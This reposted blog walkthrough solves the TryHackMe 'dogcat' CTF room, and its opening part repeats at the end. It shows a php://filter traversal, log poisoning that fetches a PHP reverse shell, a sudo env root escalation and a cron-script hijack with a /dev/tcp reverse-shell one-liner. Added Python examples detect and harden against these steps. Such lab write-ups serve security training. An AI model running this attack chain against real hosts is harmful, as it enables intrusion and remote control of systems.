03-06-2023, 04:41 AM
TryHackMe DogCat Walkthrough [+ Easy Video]
<div>
<h2>CHALLENGE OVERVIEW</h2>
<figure class="wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube"><a href="https://blog.finxter.com/tryhackme-dogcat-walkthrough-easy-video/"><img src="https://blog.finxter.com/wp-content/plugins/wp-youtube-lyte/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2F8MYrYIQR-9o%2Fhqdefault.jpg" alt="YouTube Video"></a><figcaption></figcaption></figure>
<ul>
<li><strong>Link</strong>: <a href="https://tryhackme.com/room/dogcat" target="_blank" rel="noreferrer noopener">THM Dogcat</a></li>
<li><strong>Difficulty</strong>: Medium</li>
<li><strong>Target</strong>: Flags 1-4</li>
<li><strong>Highlight</strong>: intercepting and modifying a web request using <code>burpsuite</code></li>
<li><strong>Tools used</strong>: <code>base64</code>, <code>burpsuite</code></li>
<li><strong>Tags</strong>: <em>docker, directory traversal</em></li>
</ul>
<h2>BACKGROUND</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="693" height="459" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-45.png" alt="" class="wp-image-1184695" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-45.png 693w, https://blog.finxter.com/wp-content/uplo...00x199.png 300w" sizes="(max-width: 693px) 100vw, 693px" /></figure>
</div>
<p>In this tutorial, we will walk through a simple website that shows pictures of dogs and cats. </p>
<p>We’ll discover a directory traversal vulnerability that we can leverage to view sensitive files on the target machine. </p>
<p>At the end of this challenge, we will break out of a docker container in order to capture the 4th and final flag.</p>
<h2>ENUMERATION/RECON</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="608" height="855" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-51.png" alt="" class="wp-image-1184710" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-51.png 608w, https://blog.finxter.com/wp-content/uplo...13x300.png 213w" sizes="(max-width: 608px) 100vw, 608px" /></figure>
</div>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">export target=10.10.148.135
export myIP=10.6.2.23
</pre>
<p>Let’s walk the site. </p>
<p>It looks like a simple image-viewing site that serves random images of dogs and cats. After toying around with the address in the browser, we find that directory traversal lets us view other files. </p>
<p>Let’s see if we can grab the source of the page that processes the <code>view</code> parameter in the browser address. This will help us understand what is happening on the backend. </p>
<p>We’ll use a simple PHP filter (<code>php://filter/read=convert.base64-encode</code>) to convert the file contents to <a href="https://blog.finxter.com/python-base64/" data-type="post" data-id="327003" target="_blank" rel="noreferrer noopener">base64</a> and output the raw base64 string, so the PHP source is returned to us instead of being executed by the include. </p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">http://10.10.148.135/?view=php://filter/read=convert.base64-encode/resource=./dog/../index</pre>
<p>Raw output:</p>
<pre class="wp-block-preformatted"><code>PCFET0NUWVBFIEhUTUw+CjxodG1sPgoKPGhlYWQ+CiAgICA8dGl0bGU+ZG9nY2F0PC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgdHlwZT0idGV4dC9jc3MiIGhyZWY9Ii9zdHlsZS5jc3MiPgo8L2hlYWQ+Cgo8Ym9keT4KICAgIDxoMT5kb2djYXQ8L2gxPgogICAgPGk+YSBnYWxsZXJ5IG9mIHZhcmlvdXMgZG9ncyBvciBjYXRzPC9pPgoKICAgIDxkaXY+CiAgICAgICAgPGgyPldoYXQgd291bGQgeW91IGxpa2UgdG8gc2VlPzwvaDI+CiAgICAgICAgPGEgaHJlZj0iLz92aWV3PWRvZyI+PGJ1dHRvbiBpZD0iZG9nIj5BIGRvZzwvYnV0dG9uPjwvYT4gPGEgaHJlZj0iLz92aWV3PWNhdCI+PGJ1dHRvbiBpZD0iY2F0Ij5BIGNhdDwvYnV0dG9uPjwvYT48YnI+CiAgICAgICAgPD9waHAKICAgICAgICAgICAgZnVuY3Rpb24gY29udGFpbnNTdHIoJHN0ciwgJHN1YnN0cikgewogICAgICAgICAgICAgICAgcmV0dXJuIHN0cnBvcygkc3RyLCAkc3Vic3RyKSAhPT0gZmFsc2U7CiAgICAgICAgICAgIH0KCSAgICAkZXh0ID0gaXNzZXQoJF9HRVRbImV4dCJdKSA/ICRfR0VUWyJleHQiXSA6ICcucGhwJzsKICAgICAgICAgICAgaWYoaXNzZXQoJF9HRVRbJ3ZpZXcnXSkpIHsKICAgICAgICAgICAgICAgIGlmKGNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICdkb2cnKSB8fCBjb250YWluc1N0cigkX0dFVFsndmlldyddLCAnY2F0JykpIHsKICAgICAgICAgICAgICAgICAgICBlY2hvICdIZXJlIHlvdSBnbyEnOwogICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgJF9HRVRbJ3ZpZXcnXSAuICRleHQ7CiAgICAgICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgICAgIGVjaG8gJ1NvcnJ5LCBvbmx5IGRvZ3Mgb3IgY2F0cyBhcmUgYWxsb3dlZC4nOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CiAgICAgICAgPz4KICAgIDwvZGl2Pgo8L2JvZHk+Cgo8L2h0bWw+Cg==</code></pre>
<p>Let’s save this string to a file named “<code>string</code>”. Then we can use the command “<code>cat string | base64 -d</code>” to decode the string and view it as raw source code.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="917" height="604" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-43.png" alt="" class="wp-image-1184687" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-43.png 917w, https://blog.finxter.com/wp-content/uplo...00x198.png 300w, https://blog.finxter.com/wp-content/uplo...68x506.png 768w" sizes="(max-width: 917px) 100vw, 917px" /></figure>
</div>
<p>Reading over this source, we can see that the file extension can be set by the client! </p>
<p>If the user doesn’t specify the extension, the default is <code>.php</code>. This means that we can add “<code>&ext=</code>” to the end of our web address so that no <code>.php</code> extension is appended. </p>
<p>For the include to run at all, the <code>view</code> value must contain the word “dog” or “cat”, which is why our addresses keep a harmless <code>./dog/../</code> segment in the path.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="942" height="520" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-42.png" alt="" class="wp-image-1184685" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-42.png 942w, https://blog.finxter.com/wp-content/uplo...00x166.png 300w, https://blog.finxter.com/wp-content/uplo...68x424.png 768w" sizes="(max-width: 942px) 100vw, 942px" /></figure>
</div>
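<p>To make the weak check concrete, here is an added Python model (not the room’s code or the post’s) of the include logic decoded from <code>index.php</code>, next to a hardened resolver; <code>WEB_ROOT</code> and the allowlist are assumptions of the example.</p>

```python
import os
from pathlib import PurePosixPath
from typing import Optional

# Assumed web root for this model; the room's real document root is not shown on the page.
WEB_ROOT = PurePosixPath("/var/www/html")


def vulnerable_include_target(view: str, ext: Optional[str]) -> Optional[str]:
    """Mirror of the logic decoded from the room's index.php (base64 above):

        $ext = isset($_GET["ext"]) ? $_GET["ext"] : '.php';
        if(containsStr($_GET['view'], 'dog') || containsStr($_GET['view'], 'cat')) {
            include $_GET['view'] . $ext;

    The only guard is a substring test, and the client picks the extension
    (an empty ext= still counts as "set", exactly like PHP's isset).
    Returns the string PHP would hand to include(), or None when rejected.
    """
    if "dog" not in view and "cat" not in view:
        return None  # 'Sorry, only dogs or cats are allowed.'
    return view + (".php" if ext is None else ext)


ALLOWED_VIEWS = {"dog", "cat"}  # assumed allowlist: the only two real pages


def hardened_include_target(view: str, ext: Optional[str]) -> Optional[str]:
    """Assumed hardened rewrite: exact allowlist match instead of a substring
    test, the extension is fixed server-side, and the normalised path must
    still sit under WEB_ROOT (defence in depth; the allowlist alone already
    rejects php:// wrappers and ../ traversal)."""
    if ext is not None:            # the client may never choose the extension
        return None
    if view not in ALLOWED_VIEWS:  # rejects './dog/../flag' and 'php://...'
        return None
    candidate = PurePosixPath(os.path.normpath(str(WEB_ROOT / f"{view}.php")))
    if WEB_ROOT not in candidate.parents:
        return None
    return str(candidate)


def compare(view: str, ext: Optional[str]) -> dict:
    """Side-by-side result for one request, used by the demo below."""
    return {
        "view": view,
        "ext": ext,
        "vulnerable": vulnerable_include_target(view, ext),
        "hardened": hardened_include_target(view, ext),
    }


if __name__ == "__main__":
    # Requests taken from this walkthrough plus the ext= trick it describes.
    for view, ext in [
        ("dog", None),
        ("php://filter/read=convert.base64-encode/resource=./dog/../index", None),
        ("./dog/../flag", None),
        ("./dog/../flag", ""),
        ("bird", None),
    ]:
        print(compare(view, ext))
```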
<p>Let’s dive in with <code>burpsuite</code> and start intercepting and modifying requests.</p>
<p>Here is our order of steps for us to get our initial foothold on the target machine:</p>
<ol>
<li>Create a PHP reverse shell</li>
<li>Start up our <code>netcat</code> listener</li>
<li>Use <code>burp</code> to intercept and modify the web request. Wait until later to click “<code>forward</code>”.</li>
<li>Spin up a <a rel="noreferrer noopener" href="https://blog.finxter.com/python-one-liner-webserver/" data-type="post" data-id="8635" target="_blank">simple HTTP server </a>with Python in the same directory as the PHP revshell.</li>
<li>Click “<code>forward</code>” on <code>burp</code> to send the web request.</li>
<li>Activate the shell by entering: <code>$targetIP/bshell.php</code> in the browser address</li>
<li>Catch the revshell on <code>netcat</code>!</li>
</ol>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="713" height="826" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-50.png" alt="" class="wp-image-1184709" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-50.png 713w, https://blog.finxter.com/wp-content/uplo...59x300.png 259w" sizes="(max-width: 713px) 100vw, 713px" /></figure>
</div>
<h3>STEP 1</h3>
<p>Let’s create a Pentest Monkey PHP reverse shell.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="978" height="628" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-41.png" alt="" class="wp-image-1184683" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-41.png 978w, https://blog.finxter.com/wp-content/uplo...00x193.png 300w, https://blog.finxter.com/wp-content/uplo...68x493.png 768w" sizes="(max-width: 978px) 100vw, 978px" /></figure>
</div>
<h3>STEP 2</h3>
<p>Let’s first start up a <code>netcat</code> listener on port 2222.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">nc -lnvp 2222</pre>
<h3>STEP 3</h3>
<p>Intercept the web request that pulls in the Apache2 log through the traversal, and modify the User-Agent header to carry PHP code that fetches <code>shell.php</code> from our HTTP server and saves it as <code>bshell.php</code> on the target machine. </p>
<p>This works only because, on examining the Apache2 log, we noticed that the User-Agent value is written to it unencoded, so PHP code placed in that header is executed when the log file is included through the vulnerable <code>view</code> parameter (log poisoning). Make sure to wait to click forward until step 5.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="942" height="520" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-40.png" alt="" class="wp-image-1184682" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-40.png 942w, https://blog.finxter.com/wp-content/uplo...00x166.png 300w, https://blog.finxter.com/wp-content/uplo...68x424.png 768w" sizes="(max-width: 942px) 100vw, 942px" /></figure>
</div>
<h3>STEP 4</h3>
<p>We’ll spin up a simple Python HTTP server in the same directory as our revshell so that the modified web request we built in <code>burpsuite</code> can fetch <code>shell.php</code> from us.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="467" height="123" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-39.png" alt="" class="wp-image-1184681" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-39.png 467w, https://blog.finxter.com/wp-content/uplo...300x79.png 300w" sizes="(max-width: 467px) 100vw, 467px" /></figure>
</div>
<h3>STEP 5</h3>
<p>Click forward on <code>burp</code> and check that the HTTP server logged a status code 200 for <code>shell.php</code>.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="465" height="271" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-38.png" alt="" class="wp-image-1184680" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-38.png 465w, https://blog.finxter.com/wp-content/uplo...00x175.png 300w" sizes="(max-width: 465px) 100vw, 465px" /></figure>
</div>
<h3>STEP 6</h3>
<p>We can activate the shell from our browser now and hopefully catch it as a revshell on our netcat listener.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="940" height="175" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-37.png" alt="" class="wp-image-1184679" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-37.png 940w, https://blog.finxter.com/wp-content/uplo...300x56.png 300w, https://blog.finxter.com/wp-content/uplo...68x143.png 768w" sizes="(max-width: 940px) 100vw, 940px" /></figure>
</div>
<h3>STEP 7</h3>
<p>We successfully caught it! Now we are in with our initial foothold!</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="458" height="202" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-36.png" alt="" class="wp-image-1184678" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-36.png 458w, https://blog.finxter.com/wp-content/uplo...00x132.png 300w" sizes="(max-width: 458px) 100vw, 458px" /></figure>
</div>
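<p>From the defender’s side, the foothold above leaves two distinct traces in the Apache access log: the <code>php://filter</code> and <code>../</code> traversal requests, and a request header carrying PHP tags. The following added Python example (not from the room or the post) runs that detection over constructed log lines; the combined log format and the finding names are assumptions of the example, and the poisoned User-Agent is a harmless marker rather than a payload.</p>

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" log format; one line per request.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
WRAPPER_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)  # php://, data://, ...
PHP_TAG_RE = re.compile(r"<\?(php|=)", re.IGNORECASE)

# Finding identifiers returned by analyse_line().
WRAPPER = "stream-wrapper-in-view"
TRAVERSAL = "path-traversal-in-view"
EXT_OVERRIDE = "ext-parameter-supplied"
LOG_POISON = "php-tag-in-request-header"


def analyse_line(line):
    """Return the set of findings for one access-log line (empty set if benign,
    None if the line does not parse as combined format)."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    findings = set()
    query = urlsplit(m.group("target")).query
    params = parse_qs(query, keep_blank_values=True)  # keep 'ext=' with no value
    for view in params.get("view", []):
        if WRAPPER_RE.match(view):
            findings.add(WRAPPER)
        if ".." in re.split(r"[\\/]", view):
            findings.add(TRAVERSAL)
    if "ext" in params:
        findings.add(EXT_OVERRIDE)
    # Anything Apache writes verbatim into access.log can later be executed
    # if the log is pulled in through the include; flag PHP tags in headers.
    if PHP_TAG_RE.search(m.group("ua")) or PHP_TAG_RE.search(m.group("referer")):
        findings.add(LOG_POISON)
    return findings


def scan_log(lines):
    """Return [(line_number, findings)] for every suspicious line."""
    hits = []
    for n, line in enumerate(lines, start=1):
        f = analyse_line(line)
        if f:
            hits.append((n, f))
    return hits


# Constructed sample log: an ordinary view, then the requests this page makes,
# then a poisoned User-Agent (a harmless marker instead of a real payload).
SAMPLE_LOG = [
    '10.6.2.23 - - [06/Mar/2023:04:41:00 +0000] "GET /?view=dog HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.6.2.23 - - [06/Mar/2023:04:42:10 +0000] "GET /?view=php://filter/read=convert.base64-encode/resource=./dog/../index HTTP/1.1" 200 1853 "-" "Mozilla/5.0"',
    '10.6.2.23 - - [06/Mar/2023:04:43:30 +0000] "GET /?view=./dog/../flag&ext= HTTP/1.1" 200 91 "-" "<?php echo \'poisoned\'; ?>"',
]

if __name__ == "__main__":
    for n, findings in scan_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(sorted(findings))}")
```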
<h2>INITIAL FOOTHOLD</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="688" height="613" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-49.png" alt="" class="wp-image-1184708" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-49.png 688w, https://blog.finxter.com/wp-content/uplo...00x267.png 300w" sizes="(max-width: 688px) 100vw, 688px" /></figure>
</div>
<h3>LOCATE THE FIRST FLAG</h3>
<p>Let’s grab the first flag. We can grab it from our browser again in base64, or via the command line from the revshell.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">http://10.10.148.135/?view=php://filter/read=convert.base64-encode/resource=./dog/../flag
PD9waHAKJGZsYWdfMSA9ICJUSE17VGgxc18xc19OMHRfNF9DYXRkb2dfYWI2N2VkZmF9Igo/Pgo=
</pre>
<p>Now we can decode this string (saved as <code>firstflag.txt</code>) with <code>base64</code>:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">base64 --decode firstflag.txt
<?php
$flag_1 = "THM{Th[omitted]fa}"
?>
</pre>
<h2>LOCAL RECON</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="689" height="854" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-48.png" alt="" class="wp-image-1184707" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-48.png 689w, https://blog.finxter.com/wp-content/uplo...42x300.png 242w" sizes="(max-width: 689px) 100vw, 689px" /></figure>
</div>
<h3>LOCATE THE SECOND FLAG</h3>
<p>We manually enumerate the filesystem and discover the second flag at <code>/var/www/flag2_QMW7JvaY2LvK.txt</code>.</p>
<p>The <code>find</code> command can quickly scan the filesystem for any file whose name contains the word “flag”:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">find / -type f -name '*flag*' 2>/dev/null</pre>
<p>We found the second flag in plaintext!</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">cat flag2_QMW7JvaY2LvK.txt
THM{LF[omitted]fb}
</pre>
<h3>CHECK SUDO PERMISSIONS</h3>
<p>Let’s check out our sudo permissions with the command:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">sudo -l
Matching Defaults entries for www-data on 26e23794a52b:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on 26e23794a52b:
    (root) NOPASSWD: /usr/bin/env
</pre>
<h2>EXPLOIT/PRIVILEGE ESCALATION</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="607" height="914" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-47.png" alt="" class="wp-image-1184705" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-47.png 607w, https://blog.finxter.com/wp-content/uplo...99x300.png 199w" sizes="(max-width: 607px) 100vw, 607px" /></figure>
</div>
<p>Because sudo lets us run <code>/usr/bin/env</code> as root without a password, we can easily become root with the command:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">$ sudo env /bin/bash</pre>
<p>Now we can verify that we are root with the command <code>whoami</code>.</p>
<h3>GRAB THE THIRD FLAG </h3>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">cd /root
ls
flag3.txt
cat flag3.txt
THM{D1[omitted]12}
</pre>
<h2>POST-EXPLOITATION – BREAK OUT OF THE DOCKER CONTAINER</h2>
<p>Let’s start up a new listener to catch the new bash shell outside of the container.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">nc -lnvp 3333</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="627" height="259" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-35.png" alt="" class="wp-image-1184677" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-35.png 627w, https://blog.finxter.com/wp-content/uplo...00x124.png 300w" sizes="(max-width: 627px) 100vw, 627px" /></figure>
</div>
<p>We notice that there is a <code>backup.sh</code> that runs regularly on a schedule via a cron job. Because that script is run by root outside of the docker container, we can hijack it by changing its contents to throw a revshell.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">echo "#!/bin/bash" > backup.sh; echo "bash -i>/dev/tcp/10.6.2.23/3333 0>&1" >> backup.sh
# once the scheduled job fires, the root shell arrives on the port 3333 listener:
ls
flag4.txt
cat flag4.txt
THM{esc[omitted]2d}
</pre>
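<p>The container breakout works only because a script that root runs from cron is writable from a less-trusted context. The following added Python audit (not from the room or the post) parses system-crontab entries and reports scripts that are writable by group/other, owned by the wrong user, or sitting in a world-writable directory; the crontab lines and file paths are constructed for the example.</p>

```python
import os
import re
import stat
import tempfile
from pathlib import Path

# System crontab entry: "@reboot" or five time fields, then a user, then the command.
CRON_RE = re.compile(r"^\s*(?:@\w+\s+|(?:\S+\s+){5})(?P<user>\S+)\s+(?P<cmd>.+)$")


def script_path_from_entry(entry: str):
    """Return the first token of a cron entry's command, or None for comments/blanks."""
    if not entry.strip() or entry.lstrip().startswith("#"):
        return None
    m = CRON_RE.match(entry)
    if not m:
        return None
    return m.group("cmd").split()[0]


def audit_script(path, expected_uid=0):
    """Return reasons why a cron-run script could be tampered with by a
    lower-privileged (or containerised) user: loose mode bits, wrong owner,
    or a parent directory that lets anyone replace the file."""
    reasons = []
    p = Path(path)
    try:
        st = p.stat()
    except FileNotFoundError:
        return ["missing"]
    if st.st_uid != expected_uid:
        reasons.append("not-owned-by-expected-uid")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        reasons.append("writable-by-group-or-other")
    parent = p.parent.stat()
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        reasons.append("parent-dir-world-writable")
    return reasons


def audit_crontab(text, expected_uid=0):
    """Map each absolute script path found in a crontab to its weaknesses
    (an empty list means the script passed every check)."""
    report = {}
    for entry in text.splitlines():
        script = script_path_from_entry(entry)
        if script is None or not script.startswith("/"):
            continue
        report[script] = audit_script(script, expected_uid)
    return report


def demo():
    """Constructed scenario: two scripts in a private temp dir, one left
    world-writable the way the room's backup.sh was. Returns the report."""
    tmp = Path(tempfile.mkdtemp())
    good = tmp / "rotate.sh"
    bad = tmp / "backup.sh"
    for f in (good, bad):
        f.write_text("#!/bin/bash\necho backup\n")
    good.chmod(0o755)
    bad.chmod(0o777)
    crontab = f"""# constructed system crontab
*/1 * * * * root {bad}
0 3 * * *   root {good} --quiet
"""
    # expected_uid would be 0 on a real host; here the files belong to whoever runs the demo
    return audit_crontab(crontab, expected_uid=os.getuid())


if __name__ == "__main__":
    for script, reasons in demo().items():
        print(script, reasons or "ok")
```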
<h2>FINAL THOUGHTS</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="614" height="907" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-46.png" alt="" class="wp-image-1184704" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-46.png 614w, https://blog.finxter.com/wp-content/uplo...03x300.png 203w" sizes="(max-width: 614px) 100vw, 614px" /></figure>
</div>
<p>This box was a lot of fun. The bulk of the challenge was working towards gaining the initial foothold. </p>
<p>Once we secured a revshell, the rest of the box went pretty quickly. </p>
<p>The final step of breaking out of a docker container with a second revshell was the sneakiest part for me. </p>
<p>Combining the directory traversal with a <code>php://</code> filter to base64-encode the file was also a cool way to evade the sanitization measures in place on the backend. </p>
</div>
https://www.sickgaming.net/blog/2023/03/...asy-video/
<div>
<div class="kk-star-ratings kksr-auto kksr-align-left kksr-valign-top" data-payload='{"align":"left","id":"1184671","slug":"default","valign":"top","ignore":"","reference":"auto","class":"","count":"1","legendonly":"","readonly":"","score":"5","starsonly":"","best":"5","gap":"5","greet":"Rate this post","legend":"5\/5 - (1 vote)","size":"24","width":"142.5","_legend":"{score}\/{best} - ({count} {votes})","font_factor":"1.25"}'>
<div class="kksr-stars">
<div class="kksr-stars-inactive">
<div class="kksr-star" data-star="1" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="2" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="3" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="4" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="5" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
</p></div>
<div class="kksr-stars-active" style="width: 142.5px;">
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
</p></div>
</div>
<div class="kksr-legend" style="font-size: 19.2px;"> 5/5 – (1 vote) </div>
</p></div>
<h2>CHALLENGE OVERVIEW</h2>
<figure class="wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube"><a href="https://blog.finxter.com/tryhackme-dogcat-walkthrough-easy-video/"><img src="https://blog.finxter.com/wp-content/plugins/wp-youtube-lyte/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2F8MYrYIQR-9o%2Fhqdefault.jpg" alt="YouTube Video"></a><figcaption></figcaption></figure>
<ul>
<li><strong>Link</strong>: <a href="https://tryhackme.com/room/dogcat" target="_blank" rel="noreferrer noopener">THM Dogcat</a></li>
<li><strong>Difficulty</strong>: Medium</li>
<li><strong>Target</strong>: Flags 1-4</li>
<li><strong>Highlight</strong>: intercepting and modifying a web request using <code>burpsuite </code></li>
<li><strong>Tools used</strong>: <code>base64</code>, <code>burpsuite</code></li>
<li><strong>Tags</strong>: <em>docker, directory traversal</em></li>
</ul>
<h2>BACKGROUND</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="693" height="459" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-45.png" alt="" class="wp-image-1184695" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-45.png 693w, https://blog.finxter.com/wp-content/uplo...00x199.png 300w" sizes="(max-width: 693px) 100vw, 693px" /></figure>
</div>
<p>In this tutorial, we will walk a simple website showing pictures of dogs and cats. </p>
<p>We’ll discover a directory traversal vulnerability that we can leverage to view sensitive files on the target machine. </p>
<p>At the end of this challenge, we will break out of a docker container in order to capture the 4th and final flag.</p>
<h2>ENUMERATION/RECON</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="608" height="855" src="https://blog.finxter.com/wp-content/uploads/2023/03/image-51.png" alt="" class="wp-image-1184710" srcset="https://blog.finxter.com/wp-content/uploads/2023/03/image-51.png 608w, https://blog.finxter.com/wp-content/uplo...13x300.png 213w" sizes="(max-width: 608px) 100vw, 608px" /></figure>
</div>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">export target=10.10.148.135
Export myIP=10.6.2.23
</pre>
<p>Let’s walk the site. </p>
<p>It looks like a simple image-viewing site that can randomize images of dogs and cats. After toying around with the browser addresses, we find that directory traversal allows us to view other files. </p>
